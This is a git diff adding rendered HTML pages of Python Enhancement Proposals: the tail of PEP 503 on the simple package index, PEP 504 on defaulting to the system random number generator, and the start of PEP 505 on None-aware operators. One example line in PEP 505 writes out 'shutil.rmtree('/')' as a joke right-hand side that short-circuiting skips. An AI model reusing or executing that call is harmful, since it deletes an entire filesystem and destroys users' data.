+    <a href="/spamspamspam/">spamspamspam</a>
+  </body>
+</html>
+
+
+
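
A minimal client-side sketch that extracts the project list from such a page, using only the standard library (a real client would also handle malformed pages):

+
from html.parser import HTMLParser
+
+class IndexParser(HTMLParser):
+    """Collect (project name, href) pairs from a simple index page."""
+    def __init__(self):
+        super().__init__()
+        self.projects = []
+        self._href = None
+
+    def handle_starttag(self, tag, attrs):
+        if tag == "a":
+            self._href = dict(attrs).get("href")
+
+    def handle_data(self, data):
+        if self._href is not None and data.strip():
+            self.projects.append((data.strip(), self._href))
+            self._href = None
+
+parser = IndexParser()
+parser.feed('<a href="/frob/">frob</a> <a href="/spamspamspam/">spamspamspam</a>')
+assert parser.projects == [("frob", "/frob/"), ("spamspamspam", "/spamspamspam/")]
+
+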

Below the root URL is another URL for each individual project contained within +a repository. The format of this URL is /<project>/ where the <project> +is replaced by the normalized name for that project, so a project named +“HolyGrail” would have a URL like /holygrail/. This URL must respond with +a valid HTML5 page with a single anchor element per file for the project. The +href attribute MUST be a URL that links to the location of the file for +download, and the text of the anchor tag MUST match the final path +component (the filename) of the URL. The URL SHOULD include a hash in the +form of a URL fragment with the following syntax: #<hashname>=<hashvalue>, +where <hashname> is the lowercase name of the hash function (such as +sha256) and <hashvalue> is the hex encoded digest.
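
+

For instance, a repository generating that fragment for a file might compute it as follows (the filename is hypothetical):

+
import hashlib
+
+with open("HolyGrail-1.0.tar.gz", "rb") as f:
+    digest = hashlib.sha256(f.read()).hexdigest()
+href = f"/packages/HolyGrail-1.0.tar.gz#sha256={digest}"
+
+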

+

In addition to the above, the following constraints are placed on the API:

+
    +
  • All URLs which respond with an HTML5 page MUST end with a / and the +repository SHOULD redirect the URLs without a / to add a / to the +end.
  • +
  • URLs may be either absolute or relative as long as they point to the correct +location.
  • +
  • There are no constraints on where the files must be hosted relative to the +repository.
  • +
  • There may be any other HTML elements on the API pages as long as the required +anchor elements exist.
  • +
  • Repositories MAY redirect unnormalized URLs to the canonical normalized +URL (e.g. /Foobar/ may redirect to /foobar/), however clients +MUST NOT rely on this redirection and MUST request the normalized +URL.
  • +
  • Repositories SHOULD choose a hash function from one of the ones +guaranteed to be available via the hashlib module in the Python standard +library (currently md5, sha1, sha224, sha256, sha384, +sha512). The current recommendation is to use sha256.
  • +
  • If there is a GPG signature for a particular distribution file it MUST +live alongside that file with the same name with a .asc appended to it. +So if the file /packages/HolyGrail-1.0.tar.gz existed and had an +associated signature, the signature would be located at +/packages/HolyGrail-1.0.tar.gz.asc.
  • +
  • A repository MAY include a data-gpg-sig attribute on a file link with +a value of either true or false to indicate whether or not there is a +GPG signature. Repositories that do this SHOULD include it on every link.
  • +
  • A repository MAY include a data-requires-python attribute on a file +link. This exposes the Requires-Python metadata field, specified in PEP 345, +for the corresponding release. Where this is present, installer tools +SHOULD ignore the download when installing to a Python version that +doesn’t satisfy the requirement. For example:
    <a href="..." data-requires-python="&gt;=3">...</a>
    +
    +
    +

In the attribute value, < and > have to be HTML encoded as &lt; and &gt;, respectively (a client-side filtering sketch follows this list).

    +
  • +
+
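
As an illustration of that last constraint, an installer might filter candidate downloads as sketched below (using the third party packaging project; an assumption made for illustration, not something this PEP mandates):

+
from packaging.specifiers import SpecifierSet
+
+requires_python = ">=3"  # value taken from the data-requires-python attribute
+if "3.6" in SpecifierSet(requires_python):
+    print("this download is acceptable on Python 3.6")
+
+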
+

Normalized Names

+

This PEP references the concept of a “normalized” project name. As per PEP 426 +the only valid characters in a name are the ASCII alphabet, ASCII numbers, +., -, and _. The name should be lowercased with all runs of the +characters ., -, or _ replaced with a single - character. This +can be implemented in Python with the re module:

+
import re
+
+def normalize(name):
+    return re.sub(r"[-_.]+", "-", name).lower()
+
+
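
For example:

+
>>> normalize("Holy.Grail--Of_Python")
+'holy-grail-of-python'
+
+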
+
+
+

Changes

+
    +
  • The optional data-requires-python attribute was added in July 2016.
  • +
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0503.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0504/index.html b/pep-0504/index.html
new file mode 100644
index 00000000000..6d301e6a320
--- /dev/null
+++ b/pep-0504/index.html
@@ -0,0 +1,515 @@
+
+PEP 504 – Using the System RNG by default | peps.python.org
+
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 504 – Using the System RNG by default

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
15-Sep-2015
+
Python-Version:
+
3.6
+
Post-History:
+
15-Sep-2015
+
+
+
+
+
+

Abstract

+

Python currently defaults to using the deterministic Mersenne Twister random +number generator for the module level APIs in the random module, requiring +users to know that when they’re performing “security sensitive” work, they +should instead switch to using the cryptographically secure os.urandom or +random.SystemRandom interfaces or a third party library like +cryptography.

+

Unfortunately, this approach has resulted in a situation where developers that +aren’t aware that they’re doing security sensitive work use the default module +level APIs, and thus expose their users to unnecessary risks.

+

This isn’t an acute problem, but it is a chronic one, and the often long +delays between the introduction of security flaws and their exploitation means +that it is difficult for developers to naturally learn from experience.

+

In order to provide an eventually pervasive solution to the problem, this PEP +proposes that Python switch to using the system random number generator by +default in Python 3.6, and require developers to opt-in to using the +deterministic random number generator process wide either by using a new +random.ensure_repeatable() API, or by explicitly creating their own +random.Random() instance.

+

To minimise the impact on existing code, module level APIs that require +determinism will implicitly switch to the deterministic PRNG.

+
+
+

PEP Withdrawal

+

During discussion of this PEP, Steven D’Aprano proposed the simpler alternative +of offering a standardised secrets module that provides “one obvious way” +to handle security sensitive tasks like generating default passwords and other +tokens.

+

Steven’s proposal has the desired effect of aligning the easy way to generate +such tokens and the right way to generate them, without introducing any +compatibility risks for the existing random module API, so this PEP has +been withdrawn in favour of further work on refining Steven’s proposal as +PEP 506.

+
+
+

Proposal

+

Currently, it is never correct to use the module level functions in the +random module for security sensitive applications. This PEP proposes to +change that admonition in Python 3.6+ to instead be that it is not correct to +use the module level functions in the random module for security sensitive +applications if random.ensure_repeatable() is ever called (directly or +indirectly) in that process.

+

To achieve this, rather than being bound methods of a random.Random +instance as they are today, the module level callables in random would +change to be functions that delegate to the corresponding method of the +existing random._inst module attribute.

+

By default, this attribute will be bound to a random.SystemRandom instance.

+

A new random.ensure_repeatable() API will then rebind the random._inst attribute to a random.Random instance, restoring the same module level API behaviour as existed in previous Python versions (aside from the additional level of indirection):

+
def ensure_repeatable():
+    """Switch to using random.Random() for the module level APIs
+
+    This switches the default RNG instance from the cryptographically
+    secure random.SystemRandom() to the deterministic random.Random(),
+    enabling the seed(), getstate() and setstate() operations. This means
+    a particular random scenario can be replayed later by providing the
+    same seed value or restoring a previously saved state.
+
+    NOTE: Libraries implementing security sensitive operations should
+    always explicitly use random.SystemRandom() or os.urandom in order to
+    correctly handle applications that call this function.
+    """
+    global _inst  # this function rebinds the module level attribute
+    if not isinstance(_inst, Random):
+        _inst = random.Random()
+
+
+

To minimise the impact on existing code, calling any of the following module +level functions will implicitly call random.ensure_repeatable():

+
    +
  • random.seed
  • +
  • random.getstate
  • +
  • random.setstate
  • +
+
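
Combining that delegation model with this implicit opt-in, the module level functions would look something like the following sketch (illustrative only, not actual CPython source):

+
def random():
+    """Delegate to the current default RNG instance."""
+    return _inst.random()
+
+def seed(a=None, version=2):
+    """Seeding only makes sense for the deterministic PRNG, so opt in."""
+    ensure_repeatable()
+    return _inst.seed(a, version)
+
+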

There are no changes proposed to the random.Random or +random.SystemRandom class APIs - applications that explicitly instantiate +their own random number generators will be entirely unaffected by this +proposal.

+
+

Warning on implicit opt-in

+

In Python 3.6, implicitly opting in to the use of the deterministic PRNG will +emit a deprecation warning using the following check:

+
if not isinstance(_inst, Random):
+    warnings.warn("Implicitly ensuring repeatability. "
+                  "See help(random.ensure_repeatable) for details",
+                  DeprecationWarning)
+    ensure_repeatable()
+
+
+

The specific wording of the warning should have a suitable answer added to +Stack Overflow as was done for the custom error message that was added for +missing parentheses in a call to print [10].

+

In the first Python 3 release after Python 2.7 switches to security fix only +mode, the deprecation warning will be upgraded to a RuntimeWarning so it is +visible by default.

+

This PEP does not propose ever removing the ability to ensure the default RNG +used process wide is a deterministic PRNG that will produce the same series of +outputs given a specific seed. That capability is widely used in modelling +and simulation scenarios, and requiring that ensure_repeatable() be called +either directly or indirectly is a sufficient enhancement to address the cases +where the module level random API is used for security sensitive tasks in web +applications without due consideration for the potential security implications +of using a deterministic PRNG.

+
+
+

Performance impact

+

Due to the large performance difference between random.Random and +random.SystemRandom, applications ported to Python 3.6 will encounter a +significant performance regression in cases where:

+
    +
  • the application is using the module level random API
  • +
  • cryptographic quality randomness isn’t needed
  • +
  • the application doesn’t already implicitly opt back in to the deterministic +PRNG by calling random.seed, random.getstate, or random.setstate
  • +
  • the application isn’t updated to explicitly call random.ensure_repeatable
  • +
+

This would be noted in the Porting section of the Python 3.6 What’s New guide, +with the recommendation to include the following code in the __main__ +module of affected applications:

+
if hasattr(random, "ensure_repeatable"):
+    random.ensure_repeatable()
+
+
+

Applications that do need cryptographic quality randomness should be using the +system random number generator regardless of speed considerations, so in those +cases the change proposed in this PEP will fix a previously latent security +defect.

+
+
+

Documentation changes

+

The random module documentation would be updated to move the documentation +of the seed, getstate and setstate interfaces later in the module, +along with the documentation of the new ensure_repeatable function and the +associated security warning.

+

That section of the module documentation would also gain a discussion of the +respective use cases for the deterministic PRNG enabled by +ensure_repeatable (games, modelling & simulation, software testing) and the +system RNG that is used by default (cryptography, security token generation). +This discussion will also recommend the use of third party security libraries +for the latter task.

+
+
+
+

Rationale

+

Writing secure software under deadline and budget pressures is a hard problem. This is reflected in regular notifications of data breaches involving personally identifiable information [1], as well as with failures to take security considerations into account when new systems, like motor vehicles [2], are connected to the internet. It’s also the case that a lot of the programming advice readily available on the internet simply doesn’t take the mathematical arcana of computer security into account. Compounding these issues is the fact that defenders have to cover all of their potential vulnerabilities, as a single mistake can make it possible to subvert other defences [11].

+

One of the factors that contributes to making this last aspect particularly +difficult is APIs where using them inappropriately creates a silent security +failure - one where the only way to find out that what you’re doing is +incorrect is for someone reviewing your code to say “that’s a potential +security problem”, or for a system you’re responsible for to be compromised +through such an oversight (and you’re not only still responsible for that +system when it is compromised, but your intrusion detection and auditing +mechanisms are good enough for you to be able to figure out after the event +how the compromise took place).

+

This kind of situation is a significant contributor to “security fatigue”, +where developers (often rightly [9]) feel that security engineers +spend all their time saying “don’t do that the easy way, it creates a +security vulnerability”.

+

As the designers of one of the world’s most popular languages [8], +we can help reduce that problem by making the easy way the right way (or at +least the “not wrong” way) in more circumstances, so developers and security +engineers can spend more time worrying about mitigating actually interesting +threats, and less time fighting with default language behaviours.

+
+
+

Discussion

+
+

Why “ensure_repeatable” over “ensure_deterministic”?

+

This is a case where the meaning of a word as specialist jargon conflicts with +the typical meaning of the word, even though it’s technically the same.

+

From a technical perspective, a “deterministic RNG” means that given knowledge +of the algorithm and the current state, you can reliably compute arbitrary +future states.

+

The problem is that “deterministic” on its own doesn’t convey those qualifiers, +so it’s likely to instead be interpreted as “predictable” or “not random” by +folks that are familiar with the conventional meaning, but aren’t familiar with +the additional qualifiers on the technical meaning.

+

A second problem with “deterministic” as a description for the traditional RNG +is that it doesn’t really tell you what you can do with the traditional RNG +that you can’t do with the system one.

+

“ensure_repeatable” aims to address both of those problems, as its common +meaning accurately describes the main reason for preferring the deterministic +PRNG over the system RNG: ensuring you can repeat the same series of outputs +by providing the same seed value, or by restoring a previously saved PRNG state.

+
+
+

Only changing the default for Python 3.6+

+

Some other recent security changes, such as upgrading the capabilities of the +ssl module and switching to properly verifying HTTPS certificates by +default, have been considered critical enough to justify backporting the +change to all currently supported versions of Python.

+

The difference in this case is one of degree - the additional benefits from +rolling out this particular change a couple of years earlier than will +otherwise be the case aren’t sufficient to justify either the additional effort +or the stability risks involved in making such an intrusive change in a +maintenance release.

+
+
+

Keeping the module level functions

+

In addition to general backwards compatibility considerations, Python is widely used for educational purposes, and we specifically don’t want to invalidate the wide array of educational material that assumes the availability of the current random module API. Accordingly, this proposal ensures that most of the public API can continue to be used not only without modification, but without generating any new warnings.

+
+
+

Warning when implicitly opting in to the deterministic RNG

+

It’s necessary to implicitly opt in to the deterministic PRNG as Python is +widely used for modelling and simulation purposes where this is the right +thing to do, and in many cases, these software models won’t have a dedicated +maintenance team tasked with ensuring they keep working on the latest versions +of Python.

+

Unfortunately, explicitly calling random.seed with data from os.urandom +is also a mistake that appears in a number of the flawed “how to generate a +security token in Python” guides readily available online.

+

Using first DeprecationWarning, and then eventually a RuntimeWarning, to +advise against implicitly switching to the deterministic PRNG aims to +nudge future users that need a cryptographically secure RNG away from +calling random.seed() and those that genuinely need a deterministic +generator towards explicitly calling random.ensure_repeatable().

+
+
+

Avoiding the introduction of a userspace CSPRNG

+

The original discussion of this proposal on python-ideas suggested introducing a cryptographically secure pseudo-random number generator and using that by default, rather than defaulting to the relatively slow system random number generator.

+

The problem [7] with this approach is that it introduces an additional +point of failure in security sensitive situations, for the sake of applications +where the random number generation may not even be on a critical performance +path.

+

Applications that do need cryptographic quality randomness should be using the system random number generator regardless of speed considerations, so a userspace CSPRNG would offer them no benefit in those cases.

+
+
+

Isn’t the deterministic PRNG “secure enough”?

+

In a word, “No” - that’s why there’s a warning in the module documentation +that says not to use it for security sensitive purposes. While we’re not +currently aware of any studies of Python’s random number generator specifically, +studies of PHP’s random number generator [3] have demonstrated the ability +to use weaknesses in that subsystem to facilitate a practical attack on +password recovery tokens in popular PHP web applications.

+

However, one of the rules of secure software development is that “attacks only +get better, never worse”, so it may be that by the time Python 3.6 is released +we will actually see a practical attack on Python’s deterministic PRNG publicly +documented.

+
+
+

Security fatigue in the Python ecosystem

+

Over the past few years, the computing industry as a whole has been +making a concerted effort to upgrade the shared network infrastructure we all +depend on to a “secure by default” stance. As one of the most widely used +programming languages for network service development (including the OpenStack +Infrastructure-as-a-Service platform) and for systems administration +on Linux systems in general, a fair share of that burden has fallen on the +Python ecosystem, which is understandably frustrating for Pythonistas using +Python in other contexts where these issues aren’t of as great a concern.

+

This consideration is one of the primary factors driving the substantial +backwards compatibility improvements in this proposal relative to the initial +draft concept posted to python-ideas [6].

+
+
+
+

Acknowledgements

+
    +
  • Theo de Raadt, for making the suggestion to Guido van Rossum that we +seriously consider defaulting to a cryptographically secure random number +generator
  • +
  • Serhiy Storchaka, Terry Reedy, Petr Viktorin, and anyone else in the +python-ideas threads that suggested the approach of transparently switching +to the random.Random implementation when any of the functions that only +make sense for a deterministic RNG are called
  • +
  • Nathaniel Smith for providing the reference on practical attacks against +PHP’s random number generator when used to generate password reset tokens
  • +
  • Donald Stufft for pursuing additional discussions with network security +experts that suggested the introduction of a userspace CSPRNG would mean +additional complexity for insufficient gain relative to just using the +system RNG directly
  • +
  • Paul Moore for eloquently making the case for the current level of security +fatigue in the Python ecosystem
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0504.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0505/index.html b/pep-0505/index.html new file mode 100644 index 00000000000..9a6f84b9418 --- /dev/null +++ b/pep-0505/index.html @@ -0,0 +1,978 @@ + PEP 505 – None-aware operators | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 505 – None-aware operators

+
+
Author:
+
Mark E. Haase <mehaase at gmail.com>, Steve Dower <steve.dower at python.org>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
18-Sep-2015
+
Python-Version:
+
3.8
+
+
+
+
Table of Contents +
+
+

Abstract

+

Several modern programming languages have so-called “null-coalescing” or +“null-aware” operators, including C# [1], Dart [2], Perl, Swift, and PHP +(starting in version 7). There are also stage 3 draft proposals for their +addition to ECMAScript (a.k.a. JavaScript) [3] [4]. These operators provide +syntactic sugar for common patterns involving null references.

+
    +
  • The “null-coalescing” operator is a binary operator that returns its left +operand if it is not null. Otherwise it returns its right operand.
  • +
  • The “null-aware member access” operator accesses an instance member only +if that instance is non-null. Otherwise it returns null. (This is also +called a “safe navigation” operator.)
  • +
  • The “null-aware index access” operator accesses an element of a collection +only if that collection is non-null. Otherwise it returns null. (This +is another type of “safe navigation” operator.)
  • +
+

This PEP proposes three None-aware operators for Python, based on the +definitions and other languages’ implementations of those above. Specifically:

+
    +
  • The “None coalescing” binary operator ?? returns the left hand side +if it evaluates to a value that is not None, or else it evaluates and +returns the right hand side. A coalescing ??= augmented assignment +operator is included.
  • +
  • The “None-aware attribute access” operator ?. (“maybe dot”) evaluates +the complete expression if the left hand side evaluates to a value that is +not None
  • +
  • The “None-aware indexing” operator ?[] (“maybe subscript”) evaluates +the complete expression if the left hand side evaluates to a value that is +not None
  • +
+

See the Grammar changes section for specifics and examples of the required +grammar changes.

+

See the Examples section for more realistic examples of code that could be +updated to use the new operators.

+
+
+

Syntax and Semantics

+
+

Specialness of None

+

The None object denotes the lack of a value. For the purposes of these +operators, the lack of a value indicates that the remainder of the expression +also lacks a value and should not be evaluated.

+

A rejected proposal was to treat any value that evaluates as “false” in a +Boolean context as not having a value. However, the purpose of these operators +is to propagate the “lack of value” state, rather than the “false” state.

+

Some argue that this makes None special. We contend that None is +already special, and that using it as both the test and the result of these +operators does not change the existing semantics in any way.

+

See the Rejected Ideas section for discussions on alternate approaches.

+
+
+

Grammar changes

+

The following rules of the Python grammar are updated to read:

+
augassign: ('+=' | '-=' | '*=' | '@=' | '/=' | '%=' | '&=' | '|=' | '^=' |
+            '<<=' | '>>=' | '**=' | '//=' | '??=')
+
+power: coalesce ['**' factor]
+coalesce: atom_expr ['??' factor]
+atom_expr: ['await'] atom trailer*
+trailer: ('(' [arglist] ')' |
+          '[' subscriptlist ']' |
+          '?[' subscriptlist ']' |
+          '.' NAME |
+          '?.' NAME)
+
+
+
+

The coalesce rule

+

The coalesce rule provides the ?? binary operator. Unlike most binary +operators, the right-hand side is not evaluated until the left-hand side is +determined to be None.

+
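As a point of reference, a rough current-Python desugaring of result = a ?? b might look like the following sketch (the temporary name _lhs is purely illustrative):

a, b = None, 42
+_lhs = a
+result = _lhs if _lhs is not None else b   # b is evaluated only when _lhs is None
+assert result == 42
+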

The ?? operator binds more tightly than other binary operators as most +existing implementations of these do not propagate None values (they will +typically raise TypeError). Expressions that are known to potentially +result in None can be substituted for a default value without needing +additional parentheses.

+

Some examples of how implicit parentheses are placed when evaluating operator +precedence in the presence of the ?? operator:

+
a, b = None, None
+def c(): return None
+def ex(): raise Exception()
+
+(a ?? 2 ** b ?? 3) == a ?? (2 ** (b ?? 3))
+(a * b ?? c // d) == a * (b ?? c) // d
+(a ?? True and b ?? False) == (a ?? True) and (b ?? False)
+(c() ?? c() ?? True) == True
+(True ?? ex()) == True
+(c ?? ex)() == c()
+
+
+

Particularly for cases such as a ?? 2 ** b ?? 3, parenthesizing the +sub-expressions any other way would result in TypeError, as int.__pow__ +cannot be called with None (and the fact that the ?? operator is used +at all implies that a or b may be None). However, as usual, +while parentheses are not required they should be added if it helps improve +readability.

+

An augmented assignment for the ?? operator is also added. Augmented +coalescing assignment only rebinds the name if its current value is None. +If the target name already has a value, the right-hand side is not evaluated. +For example:

+
a = None
+b = ''
+c = 0
+
+a ??= 'value'
+b ??= undefined_name
+c ??= shutil.rmtree('/')    # don't try this at home, kids
+
+assert a == 'value'
+assert b == ''
+assert c == 0 and any(os.scandir('/'))
+
+
+
+
+

The maybe-dot and maybe-subscript operators

+

The maybe-dot and maybe-subscript operators are added as trailers for atoms, +so that they may be used in all the same locations as the regular operators, +including as part of an assignment target (more details below). As the +existing evaluation rules are not directly embedded in the grammar, we specify +the required changes below.

+

Assume that the atom is always successfully evaluated. Each trailer is +then evaluated from left to right, applying its own parameter (either its +arguments, subscripts or attribute name) to produce the value for the next +trailer. Finally, if present, await is applied.

+

For example, await a.b(c).d[e] is currently parsed as +['await', 'a', '.b', '(c)', '.d', '[e]'] and evaluated:

+
_v = a
+_v = _v.b
+_v = _v(c)
+_v = _v.d
+_v = _v[e]
+await _v
+
+
+

When a None-aware operator is present, the left-to-right evaluation may be +short-circuited. For example, await a?.b(c).d?[e] is evaluated:

+
_v = a
+if _v is not None:
+    _v = _v.b
+    _v = _v(c)
+    _v = _v.d
+    if _v is not None:
+        _v = _v[e]
+await _v
+
+
+
+

Note

+

await will almost certainly fail in this context, as it would in +the case where code attempts await None. We are not proposing to add a +None-aware await keyword here, and merely include it in this +example for completeness of the specification, since the atom_expr +grammar rule includes the keyword. If it were in its own rule, we would have +never mentioned it.

+
+

Parenthesised expressions are handled by the atom rule (not shown above), +which will implicitly terminate the short-circuiting behaviour of the above +transformation. For example, (a?.b ?? c).d?.e is evaluated as:

+
# a?.b
+_v = a
+if _v is not None:
+    _v = _v.b
+
+# ... ?? c
+if _v is None:
+    _v = c
+
+# (...).d?.e
+_v = _v.d
+if _v is not None:
+    _v = _v.e
+
+
+

When used as an assignment target, the None-aware operations may only be +used in a “load” context. That is, a?.b = 1 and a?[b] = 1 will raise +SyntaxError. Use earlier in the expression (a?.b.c = 1) is permitted, +though unlikely to be useful unless combined with a coalescing operation:

+
(a?.b ?? d).c = 1
+
+
+
+
+
+

Reading expressions

+

For the maybe-dot and maybe-subscript operators, the intention is that +expressions including these operators should be read and interpreted as for the +regular versions of these operators. In “normal” cases, the end results are +going to be identical between an expression such as a?.b?[c] and +a.b[c], and just as we do not currently read “a.b” as “read attribute b +from a if it has an attribute b or else it raises AttributeError”, there is +no need to read “a?.b” as “read attribute b from a if a is not None” +(unless in a context where the listener needs to be aware of the specific +behaviour).

+

For coalescing expressions using the ?? operator, expressions should either +be read as “or … if None” or “coalesced with”. For example, the expression +a.get_value() ?? 100 would be read “call a dot get_value or 100 if None”, +or “call a dot get_value coalesced with 100”.

+
+

Note

+

Reading code in spoken text is always lossy, and so we make no attempt to +define an unambiguous way of speaking these operators. These suggestions +are intended to add context to the implications of adding the new syntax.

+
+
+
+
+

Examples

+

This section presents some examples of common None patterns and shows what +converting them to use the None-aware operators may look like.

+
+

Standard Library

+

Using the find-pep505.py script [5], an analysis of the Python 3.7 standard +library discovered up to 678 code snippets that could be replaced with use of +one of the None-aware operators:

+
$ find /usr/lib/python3.7 -name '*.py' | xargs python3.7 find-pep505.py
+<snip>
+Total None-coalescing `if` blocks: 449
+Total [possible] None-coalescing `or`: 120
+Total None-coalescing ternaries: 27
+Total Safe navigation `and`: 13
+Total Safe navigation `if` blocks: 61
+Total Safe navigation ternaries: 8
+
+
+

Some of these are shown below as examples before and after converting to use the +new operators.

+

From bisect.py:

+
def insort_right(a, x, lo=0, hi=None):
+    # ...
+    if hi is None:
+        hi = len(a)
+    # ...
+
+
+

After updating to use the ??= augmented assignment statement:

+
def insort_right(a, x, lo=0, hi=None):
+    # ...
+    hi ??= len(a)
+    # ...
+
+
+

From calendar.py:

+
encoding = options.encoding
+if encoding is None:
+    encoding = sys.getdefaultencoding()
+optdict = dict(encoding=encoding, css=options.css)
+
+
+

After updating to use the ?? operator:

+
optdict = dict(encoding=options.encoding ?? sys.getdefaultencoding(),
+               css=options.css)
+
+
+

From email/generator.py (and importantly note that there is no way to +substitute or for ?? in this situation):

+
mangle_from_ = True if policy is None else policy.mangle_from_
+
+
+

After updating:

+
mangle_from_ = policy?.mangle_from_ ?? True
+
+
+

From asyncio/subprocess.py:

+
def pipe_data_received(self, fd, data):
+    if fd == 1:
+        reader = self.stdout
+    elif fd == 2:
+        reader = self.stderr
+    else:
+        reader = None
+    if reader is not None:
+        reader.feed_data(data)
+
+
+

After updating to use the ?. operator:

+
def pipe_data_received(self, fd, data):
+    if fd == 1:
+        reader = self.stdout
+    elif fd == 2:
+        reader = self.stderr
+    else:
+        reader = None
+    reader?.feed_data(data)
+
+
+

From asyncio/tasks.py:

+
try:
+    await waiter
+finally:
+    if timeout_handle is not None:
+        timeout_handle.cancel()
+
+
+

After updating to use the ?. operator:

+
try:
+    await waiter
+finally:
+    timeout_handle?.cancel()
+
+
+

From ctypes/_aix.py:

+
if libpaths is None:
+    libpaths = []
+else:
+    libpaths = libpaths.split(":")
+
+
+

After updating:

+
libpaths = libpaths?.split(":") ?? []
+
+
+

From os.py:

+
if entry.is_dir():
+    dirs.append(name)
+    if entries is not None:
+        entries.append(entry)
+else:
+    nondirs.append(name)
+
+
+

After updating to use the ?. operator:

+
if entry.is_dir():
+    dirs.append(name)
+    entries?.append(entry)
+else:
+    nondirs.append(name)
+
+
+

From importlib/abc.py:

+
def find_module(self, fullname, path):
+    if not hasattr(self, 'find_spec'):
+        return None
+    found = self.find_spec(fullname, path)
+    return found.loader if found is not None else None
+
+
+

After partially updating:

+
def find_module(self, fullname, path):
+    if not hasattr(self, 'find_spec'):
+        return None
+    return self.find_spec(fullname, path)?.loader
+
+
+

After extensive updating (arguably excessive, though that’s for the style +guides to determine):

+
def find_module(self, fullname, path):
+    return getattr(self, 'find_spec', None)?.__call__(fullname, path)?.loader
+
+
+

From dis.py:

+
def _get_const_info(const_index, const_list):
+    argval = const_index
+    if const_list is not None:
+        argval = const_list[const_index]
+    return argval, repr(argval)
+
+
+

After updating to use the ?[] and ?? operators:

+
def _get_const_info(const_index, const_list):
+    argval = const_list?[const_index] ?? const_index
+    return argval, repr(argval)
+
+
+
+
+

jsonify

+

This example is from a Python web crawler that uses the Flask framework as its +front-end. This function retrieves information about a web site from a SQL +database and formats it as JSON to send to an HTTP client:

+
class SiteView(FlaskView):
+    @route('/site/<id_>', methods=['GET'])
+    def get_site(self, id_):
+        site = db.query('site_table').find(id_)
+
+        return jsonify(
+            first_seen=site.first_seen.isoformat() if site.first_seen is not None else None,
+            id=site.id,
+            is_active=site.is_active,
+            last_seen=site.last_seen.isoformat() if site.last_seen is not None else None,
+            url=site.url.rstrip('/')
+        )
+
+
+

Both first_seen and last_seen are allowed to be null in the +database, and they are also allowed to be null in the JSON response. JSON +does not have a native way to represent a datetime, so the server’s contract +states that any non-null date is represented as an ISO-8601 string.

+

Without knowing the exact semantics of the first_seen and last_seen +attributes, it is impossible to know whether the attribute can be safely or +performantly accessed multiple times.

+

One way to fix this code is to replace each conditional expression with an +explicit value assignment and a full if/else block:

+
class SiteView(FlaskView):
+    @route('/site/<id_>', methods=['GET'])
+    def get_site(self, id_):
+        site = db.query('site_table').find(id_)
+
+        first_seen_dt = site.first_seen
+        if first_seen_dt is None:
+            first_seen = None
+        else:
+            first_seen = first_seen_dt.isoformat()
+
+        last_seen_dt = site.last_seen
+        if last_seen_dt is None:
+            last_seen = None
+        else:
+            last_seen = last_seen_dt.isoformat()
+
+        return jsonify(
+            first_seen=first_seen,
+            id=site.id,
+            is_active=site.is_active,
+            last_seen=last_seen,
+            url=site.url.rstrip('/')
+        )
+
+
+

This adds ten lines of code and four new code paths to the function, +dramatically increasing its apparent complexity. Rewriting using the +None-aware attribute operator results in shorter code with clearer intent:

+
class SiteView(FlaskView):
+    @route('/site/<id_>', methods=['GET'])
+    def get_site(self, id_):
+        site = db.query('site_table').find(id_)
+
+        return jsonify(
+            first_seen=site.first_seen?.isoformat(),
+            id=site.id,
+            is_active=site.is_active,
+            last_seen=site.last_seen?.isoformat(),
+            url=site.url.rstrip('/')
+        )
+
+
+
+
+

Grab

+

The next example is from a Python scraping library called Grab:

+
class BaseUploadObject(object):
+    def find_content_type(self, filename):
+        ctype, encoding = mimetypes.guess_type(filename)
+        if ctype is None:
+            return 'application/octet-stream'
+        else:
+            return ctype
+
+class UploadContent(BaseUploadObject):
+    def __init__(self, content, filename=None, content_type=None):
+        self.content = content
+        if filename is None:
+            self.filename = self.get_random_filename()
+        else:
+            self.filename = filename
+        if content_type is None:
+            self.content_type = self.find_content_type(self.filename)
+        else:
+            self.content_type = content_type
+
+class UploadFile(BaseUploadObject):
+    def __init__(self, path, filename=None, content_type=None):
+        self.path = path
+        if filename is None:
+            self.filename = os.path.split(path)[1]
+        else:
+            self.filename = filename
+        if content_type is None:
+            self.content_type = self.find_content_type(self.filename)
+        else:
+            self.content_type = content_type
+
+
+

This example contains several good examples of needing to provide default +values. Rewriting to use conditional expressions reduces the overall lines of +code, but does not necessarily improve readability:

+
class BaseUploadObject(object):
+    def find_content_type(self, filename):
+        ctype, encoding = mimetypes.guess_type(filename)
+        return 'application/octet-stream' if ctype is None else ctype
+
+class UploadContent(BaseUploadObject):
+    def __init__(self, content, filename=None, content_type=None):
+        self.content = content
+        self.filename = (self.get_random_filename() if filename
+            is None else filename)
+        self.content_type = (self.find_content_type(self.filename)
+            if content_type is None else content_type)
+
+class UploadFile(BaseUploadObject):
+    def __init__(self, path, filename=None, content_type=None):
+        self.path = path
+        self.filename = (os.path.split(path)[1] if filename is
+            None else filename)
+        self.content_type = (self.find_content_type(self.filename)
+            if content_type is None else content_type)
+
+
+

The first ternary expression is tidy, but it reverses the intuitive order of +the operands: it should return ctype if it has a value and use the string +literal as fallback. The other ternary expressions are unintuitive and so +long that they must be wrapped. The overall readability is worsened, not +improved.

+

Rewriting using the None coalescing operator:

+
class BaseUploadObject(object):
+    def find_content_type(self, filename):
+        ctype, encoding = mimetypes.guess_type(filename)
+        return ctype ?? 'application/octet-stream'
+
+class UploadContent(BaseUploadObject):
+    def __init__(self, content, filename=None, content_type=None):
+        self.content = content
+        self.filename = filename ?? self.get_random_filename()
+        self.content_type = content_type ?? self.find_content_type(self.filename)
+
+class UploadFile(BaseUploadObject):
+    def __init__(self, path, filename=None, content_type=None):
+        self.path = path
+        self.filename = filename ?? os.path.split(path)[1]
+        self.content_type = content_type ?? self.find_content_type(self.filename)
+
+
+

